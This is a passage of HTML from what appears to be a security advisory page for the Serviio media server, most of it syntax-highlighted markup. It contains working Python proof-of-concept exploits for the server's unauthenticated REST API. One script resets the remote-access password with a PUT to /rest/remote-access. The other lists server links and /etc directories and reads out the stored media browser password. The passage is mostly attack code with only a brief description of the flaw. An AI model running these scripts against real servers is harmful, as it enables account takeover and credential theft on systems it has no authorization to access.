class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;[*] Example: serviio_pwd.py 10.211.55.3 23423 eagle20fox2&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e662507722520-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e662507722520-10\"><span class=\"crayon-v\">host<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-11\"><span class=\"crayon-v\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#default port for console is 23423, and for the mediabrowser is 23424.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e662507722520-12\"><span class=\"crayon-v\">lozi<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e662507722520-14\"><span class=\"crayon-v\">values<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-15\"><span class=\"crayon-s\">&lt;remoteAccess&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e662507722520-16\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&lt;remoteUserPassword&gt;{0}&lt;\/remoteUserPassword&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-17\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&lt;preferredRemoteDeliveryQuality&gt;ORIGINAL&lt;\/preferredRemoteDeliveryQuality&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e662507722520-18\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&lt;portMappingEnabled&gt;true&lt;\/portMappingEnabled&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-19\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&lt;externalAddress&gt;myserviio.dyndns.com&lt;\/externalAddress&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e662507722520-20\"><span class=\"crayon-s\">&lt;\/remoteAccess&gt;&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-21\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e662507722520-22\"><span class=\"crayon-v\">put<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">values<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">lozi<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-23\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e662507722520-24\"><span class=\"crayon-v\">headers<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-25\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Content-Type&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;application\/xml&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e662507722520-26\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Accept&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;application\/xml&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-27\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e662507722520-28\"><span class=\"crayon-v\">request<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Request<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;http:\/\/&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;:&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;\/rest\/remote-access&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">put<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-29\"><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">get_method<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lambda<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;PUT&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e662507722520-30\"><span class=\"crayon-v\">response_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">urlopen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-31\"><span class=\"crayon-v\">roottree<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ET<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fromstring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">response_body<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e662507722520-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-33\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">errorcode <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">roottree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">iter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;errorCode&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e662507722520-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;nReceived error code: &#8220;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">errorcode<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">text<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-35\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e662507722520-36\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Password successfully changed to: &#8216;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-e\">lozi<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e662507722520-37\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Go to: http:\/\/&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;:23424\/mediabrowsern&#8217;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0048 seconds] -->  <\/p>\n<p><strong>Information Disclosure<\/strong><br \/> Serviio suffer from information disclosure vulnerability due to improper access control enforcement of the Configuration REST API. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to gain access to potentially sensitive information.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-590905ee7e665132765932\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import sys  import xml.etree.ElementTree as ET  from urllib2 import Request, urlopen    if (len(sys.argv) &lt;= 2):          print &#8216;[*] Usage: serviio_id.py &lt;ip address&gt; &lt;port&gt;&#8217;          print &#8216;[*] Example: serviio_id.py 10.211.55.3 23423&#8217;          exit(0)    host = sys.argv[1]  port = sys.argv[2]    headers = {&#8216;Accept&#8217;: &#8216;application\/xml&#8217;}  request = Request(&#8216;http:\/\/&#8217;+host+&#8217;:&#8217;+port+&#8217;\/rest\/import-export\/online&#8217;, headers=headers)  print &#8216;nPrinting ServiioLinks:&#8217;  print &#8216;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-n&#8217;  response_body = urlopen(request).read()  roottree = ET.fromstring(response_body)    for URLs in roottree.iter(&#8216;serviioLink&#8217;):       print URLs.text    print    headers = {&#8216;Accept&#8217;: &#8216;application\/xml&#8217;}  #request = Request(&#8216;http:\/\/&#8217;+host+&#8217;:&#8217;+port+&#8217;\/rest\/list-folders?directory=C:\\&#8217;, headers=headers)  request = Request(&#8216;http:\/\/&#8217;+host+&#8217;:&#8217;+port+&#8217;\/rest\/list-folders?directory=\/etc&#8217;, headers=headers)  print &#8216;nPrinting directories:&#8217;  print &#8216;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;n&#8217;  response_body = urlopen(request).read()  roottree = ET.fromstring(response_body)    for URLs in roottree.iter(&#8216;path&#8217;):       print URLs.text    print    headers = {&#8216;Accept&#8217;: &#8216;application\/xml&#8217;}  request = Request(&#8216;http:\/\/&#8217;+host+&#8217;:&#8217;+port+&#8217;\/rest\/remote-access&#8217;, headers=headers)  print &#8216;nPrinting mediabrowser password:&#8217;  print &#8216;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-n&#8217;  response_body = urlopen(request).read()  roottree = ET.fromstring(response_body)    for URLs in roottree.iter(&#8216;remoteUserPassword&#8217;):       print URLs.text    print<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e665132765932-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590905ee7e665132765932-48\">48<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ElementTree <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ET<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-3\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">urllib2 <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">Request<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">urlopen<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-5\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;[*] Usage: serviio_id.py &lt;ip address&gt; &lt;port&gt;&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;[*] Example: serviio_id.py 10.211.55.3 23423&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-10\"><span class=\"crayon-v\">host<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-11\"><span class=\"crayon-v\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-13\"><span class=\"crayon-v\">headers<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;Accept&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;application\/xml&#8217;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-14\"><span class=\"crayon-v\">request<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Request<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;http:\/\/&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;:&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;\/rest\/import-export\/online&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-15\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;nPrinting ServiioLinks:&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-16\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-n&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-17\"><span class=\"crayon-v\">response_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">urlopen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-18\"><span class=\"crayon-v\">roottree<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ET<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fromstring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">response_body<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-20\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">URLs <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">roottree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">iter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;serviioLink&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">print <\/span><span class=\"crayon-v\">URLs<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">text<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-23\"><span class=\"crayon-e\">print<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-24\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-25\"><span class=\"crayon-v\">headers<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;Accept&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;application\/xml&#8217;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-26\"><span class=\"crayon-p\">#request = Request(&#8216;http:\/\/&#8217;+host+&#8217;:&#8217;+port+&#8217;\/rest\/list-folders?directory=C:\\&#8217;, headers=headers)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-27\"><span class=\"crayon-v\">request<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Request<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;http:\/\/&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;:&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;\/rest\/list-folders?directory=\/etc&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span 